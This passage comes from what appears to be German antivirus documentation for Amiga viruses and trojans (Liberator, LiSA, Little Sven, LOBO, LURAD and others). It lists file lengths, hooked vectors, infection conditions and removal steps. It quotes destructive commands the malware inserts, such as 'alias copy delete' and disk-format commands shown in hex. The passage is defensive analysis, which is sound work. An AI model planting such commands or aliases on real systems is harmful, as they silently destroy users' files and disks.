  617.          Schreibt in :s/startup-sequence: cv >NIL:
  618.             in DH0 bei mir (Auszug):
  619.           execute s:startup-sequence2
  620.           cv >NIL:        ;also fast am Schluss !!!!
  621.           endcli >NIL:
  622.  
  623.               DH1 bei mir= Wechselplatte zu der Zeit nicht gemounted
  624.  
  625.            in DH2 bei mir (AusZug):
  626.           LoadWB
  627.           cv >NIL:        ;also fast am Schluss !!!!!
  628.           EndCLI >NIL:
  629.  
  630.            in DH3 bei mir:
  631.           LoadWB -debug
  632.           cv >NIL:        ;also fast am Schluss !!!!!
  633.           endcli >NIL:
  634.          Es wurden ALLE 3 s-seq in EINEM Durchgang veraendert !!!!
  635.          MUESSEN Sie also nach dem Entfernen des VirusFiles AUCH loeschen
  636.          Das Virus-File cv wird NICHT kopiert !!!
  637.          Beim naechsten Start (vgl. s-seq) wird der Wert in .fastdir er-
  638.          hoeht. Auszug:
  639.                0000: 320A                                2.
  640.          spaeter wird .fastfile-Laenge von 2 auf 3 und dann auf 4 Bytes
  641.          erhoeht. Sobald erreicht ist: 3130300a = #100 wird ein Text
  642.          ausgegeben:
  643.   Congratulations your hard disk has been liberated of virus protection!!
  644.  
  645.          Hello from the Liberator virus v3.0 - Digital Deviant
  646.  
  647.                     The anti-anti-virus is here again!
  648.  
  649.                       Lets play trash the hard disk
  650.                          and ram the disk heads
  651.  
  652.                       Only hardcore belgian rave can
  653.                         truely liberate the mind!
  654.  
  655.                         The liberator 15/01/92
  656.  
  657.     Empfehlung: Liberator 3 und .fastdir loeschen . s.-seq in den
  658.                     den Ursprungszustand zuruecksetzen.
  659.         Hinweis: Durch die Virus-Programmierung kann es passieren, dass
  660.         nach der Aktivierung Locks auf .fastdir noch bestehen. VirusPrg
  661.         gibt den lock nicht frei. Diese Gefahr besteht nur, wenn sich
  662.         das aktive VirusPrg ueber ihre BootDisk (s-seq) gestartet hat.
  663.         VT meldet dann beim Loeschversuch DOS-Fehler. Entfernen Sie
  664.         dann bitte die Zeile aus der s-seq und booten Sie neu. Da das
  665.         VirusPrg nicht mehr aktiviert wird, koennen keine locks mehr
  666.         entstehen und das Loeschen der Virus-Files MUSS moeglich sein.
  667.         Fileerkennung mit VT getestet: 18.10.92
  668.  
  669.    - Liberator Virus V5.01
  670.          Fundort z.B.: CD-HOTTEST4/aa/2_0/disk2860.dms
  671.          Laenge: Impl4      7828
  672.          Laenge: ungepackt 16924
  673.          Weiterentwicklung von V3.0 (sehr viele source-Teile gleich)
  674.          Der "richtige" Name duerfte PV (s.u.) sein.
  675.          Liberator-Namensbegruendung s.u.
  676.  
  677.          Versucht durch Cli-Ausgabe zu taeuschen:
  678.   PV(Protect Vectors) v1.02 by Peter Stuer
  679.   July 22, 1992 FREEWARE
  680.  
  681.   Reset vectors ok, Nothing resident, Trackdisk.device not intercepted,
  682.   DoIO ok, VBlank ok, low interrupts ok, dos.library not intercepted.
  683.  
  684.   monitoring vectors...
  685.  
  686.   Fully Kickstartv2.xx compatible, stops all viruses, checks disk-validators,
  687.   Use run to push this program into the background.
  688.  
  689.     Die Tests wurden mit df0: und df1: durchgefuehrt.
  690.     Nach der Cli-Ausgabe wird gesucht und nach df1: kopiert
  691.          :c/run, :c/br  (runback), :s/.info (nach o ein Leerzeichen = $20)
  692.          .info-Laenge: 4 Bytes, .info-Startinhalt bei mir: $00000064
  693.          Hinweis: Sie MUESSEN also neben dem eigentlichen Virusfile auch
  694.          .info in s loeschen.
  695.          Kopiert :c/PV . Dabei wird IMMER der letzte Buchstabe des Files
  696.          zufallsbedingt geaendert (also aus PV wird Pe oder Pb usw.) .
  697.          Vermutlich um die Erkennung ueber Filenamen unmoeglich zu
  698.          machen. Auf Disk wurde KEIN .fastdir angelegt.
  699.          Aendert die s.-seq . (MUESSEN Sie von Hand zuruecksetzen)
  700.           vorher:
  701.                cls
  702.           nach Befall:
  703.                br c:pe
  704.                cls
  705.         Nachtrag 01.12.93: Es liegt jetzt eine komplette Disk (PD-England)
  706.         vor (mit stars). Dank an den deutschen Zusender.
  707.         Tests wurden mit HD0: durchgefuehrt.
  708.         In das Rootverzeichnis wird ".fastdir",A0,20 (4 Bytes) kopiert.
  709.         Nach S wird ".info",20 (4 Bytes) kopiert.
  710.         Nach C wird kopiert:
  711.             - run  (2568)  bitte loeschen
  712.             - br   (948)   bitte loeschen
  713.             - pvx  (7828)  wird von VT erkannt
  714.         Die Aenderung des 3. Buchstaben wurde mehrfach nachvollzogen.
  715.         Aber es gibt immer noch die alte Disk (s.o.) und falls von
  716.         dieser Disk der Lib 5.01 aktiviert wird, so wird weiterhin der
  717.         2. Buchstabe geaendert !!!!
  718.         Nachweis:
  719.         Fileheaderblock Virusteil:
  720.         alte Version:  (Filename immer nur 2 Buchstaben)
  721.           01a0: 00000000 000014c8 0000027f 00000491 ...............
  722.           01b0: 02706200 00000000 00000000 00000000 .pb.............
  723.                 ^^
  724.           01c0: 00000000 00000000 00000000 00000000 ................
  725.         neue (gepackte) Version:  (Filename immer 3 Buchstaben)
  726.           01a0: 00000000 000016c2 00000408 000000b1 ................
  727.           01b0: 03707678 00000000 00000000 00000000 .pvx............
  728.                 ^^
  729.           01c0: 00000000 00000000 00000000 00000000 ................
  730.  
  731.         Aenderungen alle Versionen:
  732.         Aendert die s.-seq.:
  733.         vorher:
  734.            ;....
  735.            C:SetPatch QUIET
  736.            C:Version >NIL:
  737.            ;....
  738.         nachher:
  739.            ;....
  740.            C:SetPatch QUIET
  741.            br c:pvs
  742.            C:Version >NIL:
  743.            ;....
  744.         d.h. die Zeile wird variabel eingesetzt und nicht immer als
  745.              1. Zeile
  746.  
  747.         WICHTIG !!!!!  WICHTIG !!!!!
  748.         Aendert die Shell-Startup (falls vorhanden):
  749.         vorher:
  750.              ;......
  751.              Prompt "%N.%S> "
  752.              Alias Clear "Echo *"*E[0;0H*E[J*" "
  753.              Alias XCopy "Copy CLONE "
  754.              ;......
  755.         nachher:
  756.              ;......
  757.              Prompt "%N.%S> "
  758.              Alias Clear "Echo *"*E[0;0H*E[J*" "
  759.              Alias XCopy "Copy CLONE "
  760.              ;liberatorV - controlling me!
  761.              alias copy delete
  762.              alias delete "echo *"No file to delete, can't find*""
  763.              ;......
  764.         MERKE !!!!!!
  765.         Falls Sie von einem Medium mit dieser Shell-Startup gebootet
  766.         haben, genuegt es NICHT, nur die Zeilen aus der Shell-Startup
  767.         zu entfernen und neu abzuspeichern. Durch die Abarbeitung der
  768.         Shell-Startup wurde im Computer der copy-Befehl bereits durch
  769.         den delete-Befehl ersetzt. Sie MUESSEN einen Reset ausfuehren,
  770.         um die Abarbeitung der NEUEN RICHTIGEN Shell-Startup zu er-
  771.         zwingen !!!!!!!!
  772.  
  773.          Das VirusFile enthaelt noch folgenden Text:
  774.      Congratulations this disk has been liberated of virus protection!!
  775.  
  776.           Hello from the Liberator virus v5.01 - Random Disaster
  777.  
  778.                    The anti-anti-virus is here again!
  779.  
  780.                      Lets play trash the hard disk
  781.                         and ram the disk heads
  782.  
  783.                            The piracy curse
  784.                    Liberator V - The future is near.
  785.  
  786.           Look out for Liberator VI - The final nightmare ...
  787.                coming soon from a lame swapper near you!
  788.  
  789.      Respect to the virus masters Lamer Exterminator,crime & Contrast.
  790.  
  791.                And remember - be excellent to each other!
  792.  
  793.                          The liberator 27/07/92
  794.                            Virus Generation :
  795.  
  796.     Diesen Text habe ich auf dem Bildschirm im Gegensatz zu Lib 3
  797.         NICHT gesehen. 
  798.         Empfehlung: Liberator 5, .info loeschen, s.-seq. UND shell-start-
  799.         up (falls vorhanden) aendern .
  800.         Hinweis: Durch die Virus-Programmierung kann es passieren, dass
  801.         nach der Aktivierung Locks auf s/.info und .fastdir noch bestehen.
  802.         VirusPrg gibt den lock nicht frei. Diese Gefahr besteht nur, wenn
  803.         sich das aktive VirusPrg ueber ihre BootDisk (s-seq) gestartet hat.
  804.         VT meldet dann beim Loeschversuch DOS-Fehler. Entfernen Sie
  805.         dann bitte die Zeile aus der s-seq und booten Sie neu. Da das
  806.         VirusPrg nicht mehr aktiviert wird, koennen keine locks mehr
  807.         entstehen und das Loeschen der Virus-Files MUSS moeglich sein.
  808.         Fileerkennung mit VT getestet:         18.10.92
  809.         Fileerkennung gepackt mit VT getestet: 01.12.93
  810.         VT versucht auch .info und .fastdir zu loeschen. Geht aber nicht,
  811.         wenn locks vorhanden sind.
  812.         Speichererkennung mit VT getestet:     01.12.93
  813.         VT versucht den Process abzuschalten. In VT/Listen/Tasks darf
  814.         "Background CLI [c:pxy]" nicht mehr auftauchen. Sie muessen aller-
  815.         dings mit einem GURU rechnen. Lieber ist es mir, wenn Sie in
  816.         VT/Tools einen KReset ausloesen !!!!!
  817.  
  818.    - LibSearcher.BB-Virus   BB
  819.         Stand: 23.08.94
  820.         Einige AntiVirusPrge erkennen einen Unkown-Virus. ( (1) oder (2) )
  821.         Das stimmt NICHT.
  822.         VT erkennt Noboot (seit 02.11.90 !!!!)
  823.         Lesen Sie bitte nach bei VT-andere.BB unter Noboot. Danke
  824.         Vielleicht aendern die anderen AntiVirusPrge die Meldung beim
  825.         naechsten Update.
  826.  
  827.    - LinkEm-Link  File
  828.         Lauffaehigkeit: wahrscheinlich nur KS1.3
  829.         VT glaubt ein File gefunden zu haben, bei dem mehrere Files mit
  830.         dem Programm LinkEm zusammengesetzt wurden.
  831.         VT empfiehlt Loeschen
  832.  
  833.    - LiSA-2.0-Trojan   Zerstoerung
  834.         Keine verbogenen Vektoren
  835.         Nicht Resetfest
  836.         68040: Ja
  837.         Bekannte Filenamen:
  838.             - 020_Upgrader.exe   L: 1660 Bytes
  839.             - 020_Upgrader.dat  (unwichtig)
  840.         Nach FileID sollen Files im C-Verz. nachgebessert werden.
  841.         In Wahrheit werden die Files in C: mit ABSICHT zerstoert. Es gibt
  842.         KEINE Rettung.
  843.         z.B. Addbuffers:
  844.             vorher:                      nachher:
  845.         00: 000003f3 00000000 ........ : 284c6953 415e4655 (LiSA^FU
  846.         08: 00000001 00000000 ........ : 434b5550 2076322e CKUP v2.
  847.         10: 00000000 00000066 .......f : 4f206279 204e6f4e O by NoN
  848.         18: 000003e9 00000066 .......f : 616d652f 4c697361 ame/Lisa
  849.         20: 4e55ffdc 48e73332 NU..H.32 : 2955ffdc 48e73332 )U..H.32
  850.         Es handelt sich um ein Scriptfile, das mit einem Programm in ein
  851.         ausfuehrbares File umgewandelt wurde.
  852.         Ablauf:
  853.         - RexxMast MUSS geladen sein.
  854.         - Das File decodiert sich selbst
  855.         - Es werden zwei Files in RAM: angelegt:
  856.          - Upgrade.dat  (ist das delete-file aus c:)
  857.          - UpDate.temp  (ist eine Liste mit den Files in c:)
  858.         - Die Liste wird durchlaufen und in jedes File an den Anfang
  859.           ein Text geschrieben.
  860.         - Nach der Fertig-Meldung sollen Sie einen Reset ausfuehren.
  861.         VT bietet fuer 020_Upgrader.exe nur Loeschen an.
  862.         VT bietet fuer defekte Files in c: nur Loeschen an.
  863.         Einfacher ist es, wenn Sie selbst das C-Verz. neu aufspielen.
  864.         Hinweis 21.07.96: Ein anderes Antivirusprogramm erkennt im Moment
  865.          in sehr vielen REXX-Programmen einen LiSA-Trojan. Dabei
  866.          handelt es sich sehr haeufig um FEHL-Erkennungen. Im Juli 96
  867.          ist bisher nur EIN ECHTER Trojan (Name siehe oben) bekannt. Ich
  868.          gehe davon aus, dass beim naechten Update der Fehler behoben
  869.          sein wird.
  870.  
  871.    - LiSA-3.0-Trojan   Zerstoerung
  872.         anderer moeglicher Name: ScanEbola97
  873.         Keine verbogenen Vektoren
  874.         Nicht Resetfest
  875.         68040: Ja
  876.         Bekannte Filenamen:
  877.             - ScanEbola97   L: 7004 Bytes
  878.         Nach FileID: ScanEbola97: Scans your hard-drive for the
  879.                      Ebola97-virus.
  880.         In Wahrheit werden bei ALLEN (!!!!) Files auf SYS: die ersten
  881.         16 Bytes veraendert.
  882.         z.B. Dir:
  883.             vorher:                      nachher:
  884.         00: 000003f3 00000000 ........ : 4c695341 20465543 LiSA FUC
  885.         08: 00000001 00000000 ........ : 4b555020 76332e30 KUP v3.0
  886.         10: 00000000 00000353 .......S : 00000000 00000353 .......S
  887.         18: 000003e9 00000353 .......S : 000003e9 00000353 .......S
  888.         Da nur wenige Bytes veraendert werden, kann VT versuchen, aus-
  889.         fuehrbare Files zu retten. Bei Daten-Files (.info, lha usw.)
  890.         ist KEINE (!!!!) Rettung durch VT moeglich.
  891.         Ob sich der Zeitaufwand lohnt muessen Sie selbst entscheiden.
  892.         Ich habe fuer eine 270MB Syquest zwei Tage gebraucht.
  893.         Bitte installieren Sie unbedingt zuerst die Workbench neu.
  894.         Es werden damit schon viele Files wieder brauchbar. Danach gehen
  895.         Sie bitte mit Sp-File-Sp und DirFTest Unterverzeichnis fuer
  896.         Unterverzeichnis durch.
  897.         Bei Data-Files ersetzt VT das "L" nach der Erkennung durch ";"
  898.         also ";iSA". Manchmal koennen Sie solche Files (z.B. startup-
  899.         sequence) noch durch Nacharbeit mit einem Editor retten.
  900.         Fuer Icons usw. dagegen kenne ich keine Loesung.
  901.  
  902.    - Little Sven  BB   anderer Name: Cameleon, Chameleon
  903.          BB ist codiert (immer neu !!).
  904.          Ein Teil der Codierung: eor.b d1,(a0)+
  905.          Decodiert ist im Speicher zu lesen:
  906.             The Curse of Little Sven!
  907.          Cool, BeginIo, Supervisor, DisplayAlert im Programm dann: DoIo,
  908.          FreeSignal
  909.  
  910.          Vermehrung: BB
  911.  
  912.          Schaeden:
  913.          - Codiert FileDatenBloecke  Kennung: $ABCD0008
  914.          (Langwort 0 eines Blocks)
  915.          Die Programme laufen, solange Little Sven im Speicher aktiv ist.
  916.          Abhilfe: VT kann diese Datenbloecke decodieren. Falls Sie also
  917.          beim FileTest oder BlockKetteTest den Requester Little Sven
  918.          erhalten, brechen Sie bitte ab und starten BlockITest .
  919.          - Verschiebt den Original-Bootblock codiert nach Block2+3.
  920.            VT kann dies rueckgaengig machen (klicken Sie auf O-BB.
  921.            Dieses Gadget war frueher Lam3 und schreiben Sie den BB zurueck).
  922.            A B E R  !!!!!!!!
  923.            Falls Block 2+3 vorher von einem File belegt war, so wurden
  924.            durch das Virusprogramm 2 Datenbloecke zerstoert. Das File
  925.            ist unbrauchbar. Es ist KEINE Rettung moeglich. VT sollte
  926.            bei BlockKetteTest b.T.Data Block 2 zeigen. Oeffnen Sie
  927.            den FileRequester (Sp-File-Sp) und loeschen Sie das File.
  928.          - Enthaelt eine Routine, die 80 Steps nach innen ausfuehrt und
  929.            dabei Daten schreibt. Diese Routine habe ich NICHT erreicht
  930.            bei Tests. Alle Daten auf der Disk waeren dann unbrauchbar ???
  931.          Wird erzeugt beim Starten von XCopyPro V6.5  (Laenge:28336)
  932.          und kopiert sich dann weiter.
  933.          Hinweis: im April 92 lag die OrigVersionsNr. von Xcopy erst
  934.             bei 5.2x (glaub ich).
  935.          Gefunden in: xcopy65e.lha  Laenge: 25360
  936.  
  937.  
  938.    - LoadWB-DFF006    File    loeschen
  939.          Im File ist zu lesen:
  940.             41f900df f0065210 10100200 000f6604 A.....R.......f.
  941.                   ^^^^^^^
  942.             206c6f61 64776220 33382e39 20283330  loadwb 38.9 (30
  943.             2e332e39 32290a0d 0000776f 726b6265 .3.92)....workbe
  944.          Dieses DFF006 kommt in meinem LoadWB NICHT vor. Empfehlung
  945.          deshalb loeschen.
  946.  
  947.    - LOBOhardc0re-Virus     Linkvirus
  948.        Namensbegruendung:
  949.         Im decodierten und entpackten Linkteil ist zu lesen:
  950.           203e4c4f 424f2068 61726463 3072653c  >LOBO hardc0re<
  951.           20627920 4d415a45 27393920 28342050  by MAZE'99 (4 P
  952.           796d6129 21204d69 6c6c656e 69756d20 yma)! Millenium
  953.           67726565 74696e67 7320746f 20616c6c greetings to all
  954.           20416d69 67612075 73657273 2e200000  Amiga users. ..
  955.       Fileverlaengerung: mind. #5000 Bytes
  956.       Nicht Resetfest
  957.       Verbogene Vektoren: LoadSeg und TRAP (variabel)
  958.       Speicherverankerung:
  959.            - "c0re" wird nicht gefunden
  960.            - powerpacker.library kann geoeffnet werden
  961.            - Loadseg wird verbogen und zwar ins ROM (s.b. LOBO)
  962.            - im ROM wird der TRAP-Befehl gesucht. Der Trap soll
  963.              variabel sein. 
  964.            - es soll also ab $80 oder VBR+$80 variabel verbogen werden.
  965.       Linkvorgang:
  966.            - mit LoadSeg und TRAP (0-F)
  967.            - File ausfuehrbar $3F3
  968.            - $3E9 wird genau gefunden (also kein 3F1 usw.)
  969.            - File groesser   #15360 Bytes
  970.            - File kleiner   #307200 Bytes
  971.            - 1.Hunk des Ursprungfiles groesser #10240 Bytes
  972.            - Medium validated
  973.            - keine Disk (mind. #91978 Bloecke)
  974.            - mind. #100 Block frei
  975.            - Filename enthaelt nicht ".", "-", "!", "V" oder "v"
  976.            - Das Virusteil codiert sich immer neu mit $DFF006
  977.            - Es entstehen immer verseuchte Files mit 2 Hunks
  978.              Der 1. Hunk enthaelt das Virusteil. Ein Teil dieses Hunks
  979.              ist jetzt mit PP.lib gepackt.
  980.              Der 2.Hunk ist das ganze Orginalfile. Leider kann man den
  981.              2.Hunk nicht einfach zurueckschreiben, da 8 Bytes im Ursprungs-
  982.              file codiert werden. Es muss im Virusteil das Codier-Langwort
  983.              gesucht werden. Dieses LW aendert sich immer in Abhaengigkeit
  984.              von $DFF006.
  985.        Hinweis: Bei Tests sind defekte Files (rund 1/4) entstanden. Bei
  986.        Aufruf eines defekten Prgs immer GURU. Da es so viele defekte Files
  987.        sind, versucht VT auch hier einen Ausbau. ABER Sie MUESSEN beim
  988.        Ausbauversuch mit einem Guru rechnen. Es bleibt Ihnen dann nur
  989.        Loeschen des Files uebrig.
  990.        Hinweis2: Es koennte zu Fehlerkennungen kommen. Bitte melden
  991.        Sie sich dann mit einem Beispielfile. VT findet das Teil
  992.        NUR !!!! bei Filetest.
  993.  
  994.    - LOBOsimple-Virus     Linkvirus  
  995.       Namensbegruendung:    
  996.            Im decodierten LinkTeil ist zu lesen: 
  997.            ffff4e75 4e7a0801 4e734454 00000000 ..NuNz..NsDT....
  998.                ;....
  999.            2f480006 41fa050e 2081205f 4e733e4c /H..A... . _Ns>L
  1000.            4f424f73 696d706c 653c4cdf 4eb900f9 OBOsimple<L.N...
  1001.                ;....
  1002.            7fff4a80 4e752323 506c695a 20646f6e .J.Nu##PliZ don
  1003.            74207368 6f6f7421 20492061 6d204e4f t shoot! I am NO
  1004.            54206120 56495255 53212323 536e6f6f T a VIRUS!##Snoo
  1005.            70446f73 000041fa 04164c90 00ff6100 pDos..A...L...a.
  1006.                ;....
  1007.            00086100 03604e75 3e62794d 415a4539 ..a..`Nu>byMAZE9
  1008.            363c6100                            6<a.
  1009.       Fileverlaengerung: #1912 Bytes
  1010.       Nicht Resetfest
  1011.       Verbogene Vektoren: LoadSeg und TRAP1
  1012.         Speicherverankerung:
  1013.            - Suche nach SnoopDos und DT (Debugger ??) siehe auch Hinweis
  1014.              falls gefunden, dann Ende
  1015.            - Loadseg schon verbogen $4E41
  1016.            - Loadseg wird verbogen und zwar ins ROM
  1017.            - im ROM wird der TRAP1-Befehl gesucht 4e41 = "NA"
  1018.            4e5d4e75 4e414d45 2c535452 494e472f N]NuNAME,STRING/
  1019.                     ^^^^                           ^^
  1020.            - $84 oder VBR+$84 wird verbogen  
  1021.         Linkvorgang:
  1022.            - mit LoadSeg und TRAP1
  1023.            - Medium validated
  1024.            - keine Disk (zuwenig Gesamtbloecke)
  1025.            - mind. #30 Block frei
  1026.            - Filename enthaelt nicht ".", "-", "!", "VIR" oder "vir"
  1027.            - Das Virusteil codiert sich immer neu mit $DFF006
  1028.            - Link als neuer erster Hunk ($1DA) vor das Originalfile
  1029.              Es muessen also die anderen Hunks nachbearbeitet werden.
  1030.              Da das Virusteil nicht sehr viele Hunktypen kennt, ent-
  1031.              stehen auch defekte Files (bei Tests nachgewiesen) .
  1032.       Hinweis eines Users Nov.98: Danke
  1033.         Bei DT handelt es sich sicherlich um DOSTrace von Peter Stuer
  1034.         (z.B. auf der Meeting_Pearls_III:Pearls/debug/Snooper/DOSTrace
  1035.         oder im AmiNet unter util/moni zu finden), weil:
  1036.          1. DT ist im Prinzip das selbe wie SnoopDos
  1037.          2. Der Filename (und somit der Taskname) von DOSTrace lautet im
  1038.             Originalarchiv DT
  1039.  
  1040.  
  1041.    - LOBOweird-Inst.      Installer
  1042.          Ein uncodierter LOBOweird-Virus
  1043.          Rest siehe bei LOBOweird
  1044.  
  1045.    - LOBOweird-Virus     Linkvirus
  1046.       Namensbegruendung:    
  1047.            Im decodierten LinkTeil ist zu lesen: 
  1048.            4c4f424f 77656972 642e48e7 808041fa LOBOweird.H...A.
  1049.              ;....
  1050.            4e732041 4e54492d 56495220 50415443 Ns ANTI-VIR PATC
  1051.            48206279 204d415a 45273937 21204eb9 H by MAZE'97! N.
  1052.                     6<a.
  1053.       Fileverlaengerung: mind. #2100 Bytes
  1054.       Nicht Resetfest
  1055.       Verbogene Vektoren: LoadSeg und TRAP (soll jetzt variabel sein)
  1056.       Speicherverankerung:
  1057.            - "LOBO" wird nicht gefunden  
  1058.            - Loadseg wird verbogen und zwar ins ROM   
  1059.            - im ROM wird der TRAP-Befehl gesucht. Der Trap soll jetzt
  1060.              variabel sein. Es wird mit TRAP0 ($4e40) begonnen. In all
  1061.              meinen ROMs wird aber erst TRAP1 (siehe oben bei LOBOsimple)
  1062.              gefunden.
  1063.            - es soll also ab $80 oder VBR+$80 variabel verbogen werden.
  1064.              Bei mir wird also immer $84 oder VBR+$84 verbogen.
  1065.       Linkvorgang:
  1066.            - mit LoadSeg und TRAP
  1067.            - File groesser   #7913 Bytes
  1068.            - File kleiner  #255600 Bytes
  1069.            - Medium validated
  1070.            - keine Disk (mind. #91978 Bloecke)
  1071.            - mind #30 Block frei
  1072.            - Filename enthaelt nicht ".", "-", "!", "VIR" oder "vir"
  1073.            - Das Virusteil codiert sich immer neu mit $DFF006
  1074.            - Es entstehen immer verseuchte Files mit 2 Hunks
  1075.              Der 1. Hunk enthaelt das Virusteil. Der 2.Hunk ist das ganze
  1076.              Originalfile. Leider kann man den 2.Hunk nicht einfach zurueck-
  1077.              schreiben, da 8 Bytes im Originalfile codiert werden. Es muss
  1078.              im Virusteil das Codier-Langwort gesucht werden. Dieses LW
  1079.              aendert sich immer in Abhaengigkeit von $DFF006.
  1080.  
  1081.  
  1082.    - LOGIC BOMB   anderer Name: PARADOX I   s.d.
  1083.  
  1084.    - LOOK-BBS-Trojan  Name uebernommen nicht nachvollziehbar im Speicher
  1085.          Laenge gepackt:  1392 Bytes
  1086.          Laenge entpackt: 1456 Bytes
  1087.          Verbogener Vektor: Cool auf Endlos-Farbroutine NACH DisplayAlert
  1088.          Keine Vermehrungsroutine
  1089.          Wahrscheinlich von CONMAN.
  1090.          Im entpackten File ist zu lesen:              
  1091.            00000000 00536e6f 6f70446f 7300646f .....SnoopDos.do
  1092.            732e6c69 62726172 79004155 583a0042 s.library.AUX:.B
  1093.            42533a55 5345522e 44415441 00434f4e BS:USER.DATA.CON
  1094.            3a302f30 2f333230 2f313030 2f524541 :0/0/320/100/REA
  1095.            444d4521 004e494c 3a00433a 4d4f554e DME!.NIL:.C:MOUN
  1096.            54204155 583a0000 0c200a20 0a1b5b32 T AUX:... . ..[2
  1097.          Gefahr nur fuer Mailbox-Betreiber.
  1098.          Empfehlung loeschen.
  1099.          Sucht nach SnoopDos.
  1100.          Versucht AUX anzumelden Nein dann Ende
  1101.          Schreibt aus USER.DATA Teile nach AUX:
  1102.          Wahrscheinlich ein Einbruchsversuch.
  1103.          Oeffnet zur Taeuschung ein Fenster und gibt Reset-Text aus:
  1104.            0a1b5b32 3b316d1b 5b3b3432 6d20506c ..[2;1m.[;42m Pl
  1105.            65617365 20576169 74202121 21202020 ease Wait !!!
  1106.            1b5b306d 0a1b5b32 3b316d1b 5b3b3432 .[0m..[2;1m.[;42
  1107.            6d204c6f 6164696e 67204441 54412e2e m Loading DATA..
  1108.              ;.....
  1109.            534f5252 59204d49 5353494e 47204441 SORRY MISSING DA
  1110.            54412046 494c4520 32202120 504c4541 TA FILE 2 ! PLEA
  1111.            53452052 45424f4f 54202121 21201b5b SE REBOOT !!! .[
  1112.          Wem das noch nicht reicht, bekommt noch einen DisplayAlert
  1113.          Text angeboten: FATAL HARDWARE ERROR  usw. und eine Endlos-
  1114.          schleife (s.o.) .
  1115.  
  1116.  
  1117.    - LOOP-COMBO-Virus     File  Laenge: 1848 Bytes
  1118.          Auf Disk als Disk-Validator getarnt
  1119.          KS 1.3: ja
  1120.          KS 2.0: nein
  1121.          Vermehrung: nein   reines Zerstoerungsprogramm
  1122.          Im File ist an $490 uncodiert zu lesen:   
  1123.            00242429 000c222a 02d07041 6e642041 .$$).."*..pAnd A
  1124.            6761696e 20467563 6b656420 75702100 gain Fucked up!.
  1125.          Decodiert mit eori.b d1,(a1)+ ist im File zu lesen:
  1126.            144d4954 204d4952 204e4943 48542c20 .MIT MIR NICHT,
  1127.            44552041 46464520 21212121 21000100 DU AFFE !!!!!...
  1128.            0a1e5645 52535543 4860204c 49454245 ..VERSUCH` LIEBE
  1129.            52204d41 4c204549 4e454e20 4c4f4f50 R MAL EINEN LOOP
  1130.            2d434f4d 424f2121 0001000a 284f4445 -COMBO!!....(ODE
  1131.                  usw.
  1132.          Schaden:
  1133.          Sobald unter KS 1.3 eine Disk mit ungueltigem BitMapZeiger
  1134.          eingelegt wird, wird das Teil gestartet.
  1135.          Kopfstep Disk danach bad
  1136.          Versuchen Sie mit Disksalve noch etwas zu retten.
  1137.          Textausgabe mit DisplayAlert .
  1138.          Loeschen Sie bitte unbedingt das Teil auch wenn SIE schon
  1139.          KS 2.0 oder mehr haben. Falls Sie so eine Disk weitergeben
  1140.          kann sonst ihr Bekannter mit Ks1.3 eine boese Ueberraschung
  1141.          erleben. Spielen Sie bitte auch einen sauberen Disk-Validator
  1142.          auf. Danke
  1143.  
  1144.    - LOVEMACHINE-Virus  BB  Warhawk-Clone  s.u.
  1145.            44452042 59202020 4c204f20 56204520 DE BY   L O V E
  1146.            4d204120 43204820 49204e20 45273930 M A C H I N E'90
  1147.  
  1148.    - LSD!      (noch ein SCA!)
  1149.  
  1150.    - lummin-Virus  File  siehe unten bei XaCa-Virus
  1151.  
  1152.    - LUPO-Virus   File   Nano-Clone  s.u.
  1153.               Laenge PP gepackt: 1420 Bytes
  1154.               Laenge ungepackt : 1484 Bytes
  1155.       Name des Files VOR der Vermehrung wahrscheinlich memclear
  1156.       Namensbegruendung: s.u.
  1157.       Unterschiede zu Nano:
  1158.           - anderer Text
  1159.           - unsichtbarer Filename soll " " sein
  1160.        Eine Meisterleistung !!!!!
  1161.            3a200000 00000000 3a732f73 74617274 : ......:s/start
  1162.            ^^^^^^
  1163.            75702d73 65717565 6e636500 20000000 up-sequence. ...
  1164.            0000200a 00c80a2e 2e2e6120 6e657720 .. .......a new
  1165.            76697275 73207275 6e6e6572 2066726f virus runner fro
  1166.            6d204c20 55205020 4f202120 2000140a m L U P O !  ...
  1167.  
  1168.              ^^ = ": ",0 = unsichtbarer Filename fuer Root
  1169.       Die Vermehrung von LUPO findet UNGEPACKT statt !!! 
  1170.       Weiterhin ist bemerkenswert, dass in die startup-sequence eine
  1171.       Zeile mit einem Leerzeichen und return eingebaut werden soll. Nach
  1172.       meinem Wissensstand wird ein normales Leerzeichen in der startup-
  1173.       sequence nicht als Filename , sondern als Leerzeile behandelt.
  1174.       Also wird das vermehrte Virusteil NIE aufgerufen.
  1175.       Speichererkennung von VT: als LUPO
  1176.       Fileerkennung von VT    : als NANO   mehr ist die Sache nicht wert.
  1177.  
  1178.    - LURAD-Trojan    Zerstoerung
  1179.          anderer moeglicher Name: HDprotect-Trojan
  1180.          Filename:hdprotect
  1181.          Filelaenge gepackt:   3984 Bytes
  1182.          Filelaenge entpackt: 20200 Bytes
  1183.          Entpackt ist im File zu lesen:
  1184.             756e203e 4e494c3a 20666f72 6d617420 un >NIL: format
  1185.             64726976 65206468 303a206e 616d6520 drive dh0: name
  1186.             4c555241 44007275 6e203e4e 494c3a20 LURAD.run >NIL:
  1187.             666f726d 61742064 72697665 20646831 format drive dh1
  1188.             3a206e61 6d65204c 55524144 20515549 : name LURAD QUI
  1189.             434b0072 756e203e 4e494c3a 20666f72 CK.run >NIL: for
  1190.             6d617420 64726976 65206468 323a206e mat drive dh2: n
  1191.             616d6520 484f525f 554e4745 20515549 ame HOR_UNGE QUI
  1192.             434b0057 6f726b69 6e67206f 6e204448 CK.Working on DH
  1193.              ;....
  1194.             33336d48 61726464 69736b20 70726f74 33mHarddisk prot
  1195.             65637420 76657273 696f6e20 362e3234 ect version 6.24
  1196.          Versucht durch Textausgabe in Shell zu taeuschen. Soll dh0,
  1197.          dh1 und dh2 formatieren.
  1198.  
  1199.    - LVirus-$F8    Linkvirus
  1200.       Namensbegruendung: Fileverlaengerung #248 = $F8, da kein Text im
  1201.                          Linkteil.
  1202.       Fileverlaengerung: #248 Bytes
  1203.       Nicht Resetfest
  1204.       Verbogener Vektor: DosWrite
  1205.       Fehlerquelle: kein Test auf KS1.3 (DosWrite)
  1206.       Speicherverankerung:
  1207.            - Test ob schon im Speicher
  1208.            - DosWrite wird verbogen
  1209.       Linkvorgang:
  1210.            - File noch nicht verseucht
  1211.            - CodeHunk wird gefunden ($3E9)
  1212.            - 1.Hunk nicht groesser als #8192  (wg. Sprung)
  1213.            - Das erste LW des 1.Hunks wird durch bsr Virus ($6100wxyz)
  1214.              ersetzt.
  1215.            - Link hinter den 1.Hunk
  1216.       VT versucht Write im Speicher zurueckzusetzen.
  1217.       VT versucht den Fileausbau.
  1218.  
